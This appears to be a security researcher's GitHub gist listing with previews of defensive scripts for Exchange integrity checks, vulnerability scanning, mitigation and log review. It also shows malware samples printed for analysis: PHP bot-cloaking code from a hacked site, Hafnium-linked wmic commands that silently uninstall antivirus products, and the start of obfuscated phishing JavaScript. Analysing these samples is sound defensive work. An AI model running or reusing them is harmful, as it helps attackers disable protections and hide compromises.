Skip to content

Instantly share code, notes, and snippets.

View ExchangeIntegrity.ps1
Exchange IIS Server Integrity Check
Identify common webshells and backdoors associated with compromises
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates
Write-IntegrityFile [ -hashfile "filename.json" ]
View hacked.php
if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
technion / Exchange Version.nse
Created Nov 17, 2021
Scan Microsoft Exchange Version for vulnerability
View Exchange Version.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local string = require "string"
author = {""}
license = "Same as Nmap--See"
categories = {"discovery", "safe"}
-- Detection rule based on:
technion / CVE-2021-40444Mit.ps1
Last active Sep 12, 2021
CVE-2021-40444 Mitigation Script
View CVE-2021-40444Mit.ps1
Set-Strictmode -Version 2
# Applies reg keys from
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section
for($i = 0; $i -le 3; $i++) {
$RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i"
if (-not (Test-Path $RegPath)) {
New-Item $RegPath -Force
technion / AutorunsVT.ps1
Created Apr 23, 2021
Review CSV file from autorunsc.exe a and handle Virustotal detections
View AutorunsVT.ps1
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
$detection = $item.'VT detection'
if ($detection -eq "" -or $detection -eq 'Unknown') {
Write-Output $detection
technion / Malicious.ps1
Created Mar 20, 2021
RE on Hafnium exploited server
View Malicious.ps1
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
technion / LicenseManagement.ps1
Created Nov 13, 2020
Office 365 license management
View LicenseManagement.ps1
Set-StrictMode -Version 2
# Connect first
# Connect-AzureAD
function Get-LicencesforUser
# $user should be populated with
# $user = Get-AzureADUser -ObjectId
technion / tank.wa
Created Nov 12, 2020
Warlock tanking weak aura
View tank.wa
technion / Scan-Netlogon-Secure.ps1
Last active Aug 16, 2020
Search domain controllers for events relating to Netlogon vulnerability
View Scan-Netlogon-Secure.ps1
# More information:
Set-StrictMode -Version 2
# Fetch all Domain Controllers. Use this pattern to fetch from all sites.
$addomain = Get-ADDomain
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)"
foreach ($dc in $controllers) {
# Errors are ignored so as not to throw an exception if there are no such logs found
Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore
technion / phishing.js
Last active Aug 12, 2020
blog of phishing code
View phishing.js
'use strict';
/** @type {!Array} */
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string",
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write"